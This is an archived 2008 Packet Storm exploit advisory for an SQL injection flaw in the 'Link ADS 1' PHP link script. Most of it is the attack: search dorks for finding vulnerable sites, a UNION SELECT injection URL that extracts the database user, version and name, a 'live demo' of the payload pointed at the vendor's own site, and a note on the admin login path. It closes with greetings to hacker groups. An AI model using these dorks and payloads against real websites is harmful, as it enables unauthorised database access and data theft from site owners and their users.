linkads-sql.txt

2008-06-25T00:00:00
ID PACKETSTORM:67673
Type packetstorm
Reporter Hussin X
Modified 2008-06-25T00:00:00

Description

                                        
                                            `#########################################################  
#  
# Link ADS 1 SQL Injection Vulnerability  
#========================================================  
#  
# Author: Hussin X   
#   
# Home : www.tryag.cc/cc   
#   
# email: darkangel_g85[at]Yahoo[DoT]com   
# hussin.x[at]hotmail[DoT]com   
#   
#========================================================  
# HomE script : http://e-topbiz.com/  
#   
# Demo : http://e-topbiz.com/oprema/pages/linkads1.php   
#   
# DorK : out.php?linkid=1  
# DorK : inurl:"out.php?linkid=1"  
##########################################################  
  
Exploit:   
  
  
http://www.site.org/Script/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--  
  
  
  
  
L!VE DEMO:  
  
http://e-topbiz.com/trafficdemos/linkads1/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--  
  
  
LogiN:  
  
  
/admin/  
  
  
################################################################################  
####################################( Greetz )##################################  
# #  
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke #   
  
# Silic0n / Rafi / FAHD / Iraqihack #   
  
# #  
#################################(and All IRAQIs)###############################  
################################################################################  
  
`